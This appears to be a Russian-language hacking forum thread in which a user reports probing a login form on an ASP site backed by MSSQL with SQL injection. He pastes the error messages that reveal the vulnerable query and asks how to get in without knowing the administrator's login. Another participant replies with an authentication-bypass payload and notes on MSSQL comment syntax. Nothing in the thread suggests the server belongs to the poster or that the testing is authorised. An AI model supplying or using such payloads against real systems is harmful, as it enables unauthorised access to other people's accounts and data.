Скуль инъекция

[aivus]

Вообщем есть сервер, на нем есть страничка ASP на которой стандартная форма login-pass

опробовал я ее на скуль

login: ' or '
pass: 123

ответ

Microsoft OLE DB Provider for SQL Server error '80040e14' Line 1: Incorrect syntax near '123'. /asp/members.asp, line 94

login: 123
pass: ' or '

Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string 'or ') AND (approve = 1)'. /asp/members.asp, line 94

Вот........ только вот не пойму, что с этого можно поиметь, если учесть то, что каждый пользователь в системе имеет RANDOM логин, то есть логина админа я не знаю...

 

[Winux]

По-моему не хватает кавычки или лишняя кавычка. По-моему всеже не хватает.

 

[007NOT@]

login: ' or '1' -- (насколько помню комментарий в MSSQL - -- если нет то исчи в мане как комментить )
pass: *
зы возможно понадобяться ещё )

 

[Winux]

А вообще я недавно статью переводил. Вот ее почитай, там все написано по понятиям.